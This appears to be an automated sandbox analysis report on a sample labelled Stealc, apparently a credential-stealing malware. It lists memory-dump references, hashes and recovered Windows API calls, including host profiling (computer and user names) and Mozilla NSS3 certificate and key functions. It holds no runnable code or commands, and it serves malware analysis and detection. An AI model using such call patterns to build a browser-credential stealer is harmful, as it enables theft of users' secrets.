                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2500673778-0
                                                                                                                                                                            • Opcode ID: 7740bfaf5c850da93ec48b1e258fd1ee9813a33e7b05ca1930d877780315be2b
                                                                                                                                                                            • Instruction ID: a9bf8d73e4f76650c37ca5038d0b36a8b3040910f73e8b921e0524a6103af77e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7740bfaf5c850da93ec48b1e258fd1ee9813a33e7b05ca1930d877780315be2b
                                                                                                                                                                            • Instruction Fuzzy Hash: F0710E71950118EBEF05FBA0DD9ADEE7378AF54300F40456AF506A6191EF3C6A09CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00776DBE,00776DBE,00003000,00000040), ref: 00776706
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00776DBE,00003000,00000040), ref: 00776753
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 123f3de61dd20dbe8e1f64a6ab078965f14896850ca6563a15ed9bab00fcfc33
                                                                                                                                                                            • Instruction ID: dc2cdbf8e8ca4d457ce43eb423554800259592d92d8c7275c5b6d76ae1a75caa
                                                                                                                                                                            • Opcode Fuzzy Hash: 123f3de61dd20dbe8e1f64a6ab078965f14896850ca6563a15ed9bab00fcfc33
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A41A474A00209EFCB44CF98C494BADBBB1FB48354F24C2A9E9599B355D735AA81CF84
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0077114E,?,?,00786A1C), ref: 007710B3
                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0077114E,?,?,00786A1C), ref: 007710F7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                                            • Opcode ID: 8a0d9d792a3066fe0bf1b33c7c43d662404f7c907f3ee913dc21fec337910724
                                                                                                                                                                            • Instruction ID: d9f72e4da44ca629acb33cf2d580ba55da82a7235229ef3ac0a3fdf82d8f9a15
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a0d9d792a3066fe0bf1b33c7c43d662404f7c907f3ee913dc21fec337910724
                                                                                                                                                                            • Instruction Fuzzy Hash: 40F0E271681308BBEB149AA8AC89FAAB7ECE705B65F304548F504E3280D571AE00DBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,00780117,?,00000000,?,00000000,00790DAB,00790DAA), ref: 00788D9F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 4037d6d13f07e636030cd866e2303a52a620f0a284f43d1bbcaa845c877bd888
                                                                                                                                                                            • Instruction ID: 8ce7c11224a2de0c4a0447b3395f0f41e2036ecdf7e5e66caa9c0c3401bd34e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 4037d6d13f07e636030cd866e2303a52a620f0a284f43d1bbcaa845c877bd888
                                                                                                                                                                            • Instruction Fuzzy Hash: B4F01570D44208FBDB04FFA4D5496DCBB74EB14320F50829AE866673C0DB386A45DB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1699248803-0
                                                                                                                                                                            • Opcode ID: 9e1302c0367ca742c4289e85a34ec26b9ba68243580706dabd00d1f0a3091ff6
                                                                                                                                                                            • Instruction ID: b61ad13fecf9bee610f6df1ea9273c567b6a0a8b3d7fe92bb4f2d2d8e5c3e61f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1302c0367ca742c4289e85a34ec26b9ba68243580706dabd00d1f0a3091ff6
                                                                                                                                                                            • Instruction Fuzzy Hash: D7E0123194034CBBDB91EB50DC96FAD737C9B44B11F004295BA0C5A1C0DE74AB858B91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
                                                                                                                                                                              • Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
                                                                                                                                                                              • Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F
                                                                                                                                                                              • Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
                                                                                                                                                                              • Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
                                                                                                                                                                              • Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 007711C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1004333139-0
                                                                                                                                                                            • Opcode ID: 846b89fbfd484c71d425a0501a2fb5b1f2fc2d2262c16530fe712125616d81e7
                                                                                                                                                                            • Instruction ID: cbbb3a0822547a030f5ed33fb02f381eee4d493d08b531911bc5f0b10014b718
                                                                                                                                                                            • Opcode Fuzzy Hash: 846b89fbfd484c71d425a0501a2fb5b1f2fc2d2262c16530fe712125616d81e7
                                                                                                                                                                            • Instruction Fuzzy Hash: 70E0C2B1968305E3CE0437F4AD4EB2A338C5B10385F844528FA09C2142FE2DE800C767
                                                                                                                                                                            APIs
                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00780759,?,?), ref: 00779888
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ??2@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1033339047-0
                                                                                                                                                                            • Opcode ID: d8ab43379ebbaa15f17ce83adb48ce0e456d0bcf95acbef2b078b964938d0db2
                                                                                                                                                                            • Instruction ID: 52de6b965c3602efefe2e6e791142e08ad50e7b6c929ff31960573e20e6c274b
                                                                                                                                                                            • Opcode Fuzzy Hash: d8ab43379ebbaa15f17ce83adb48ce0e456d0bcf95acbef2b078b964938d0db2
                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF0F4B5D40208FBDB00EFA4D946B9DB7B4EB05300F108595EA1997285E675AB14CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F7C33
                                                                                                                                                                            • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C8F7C66
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6C8F7D1E
                                                                                                                                                                              • Part of subcall function 6C8F7870: SECOID_FindOID_Util.NSS3(?,?,?,6C8F91C5), ref: 6C8F788F
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8F7D48
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C8F7D71
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C8F7DD3
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8F7DE1
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F7DF8
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8F7E1A
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C8F7E58
                                                                                                                                                                              • Part of subcall function 6C8F7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8F91C5), ref: 6C8F78BB
                                                                                                                                                                              • Part of subcall function 6C8F7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C8F91C5), ref: 6C8F78FA
                                                                                                                                                                              • Part of subcall function 6C8F7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F7930
                                                                                                                                                                              • Part of subcall function 6C8F7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F7951
                                                                                                                                                                              • Part of subcall function 6C8F7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8F7964
                                                                                                                                                                              • Part of subcall function 6C8F7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8F797A
                                                                                                                                                                              • Part of subcall function 6C8F7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C8F7988
                                                                                                                                                                              • Part of subcall function 6C8F7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C8F7998
                                                                                                                                                                              • Part of subcall function 6C8F7870: free.MOZGLUE(00000000), ref: 6C8F79A7
                                                                                                                                                                              • Part of subcall function 6C8F7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F79BB
                                                                                                                                                                              • Part of subcall function 6C8F7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C8F91C5), ref: 6C8F79CA
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8F7E49
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8F7F8C
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8F7F98
                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8F7FBF
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8F7FD9
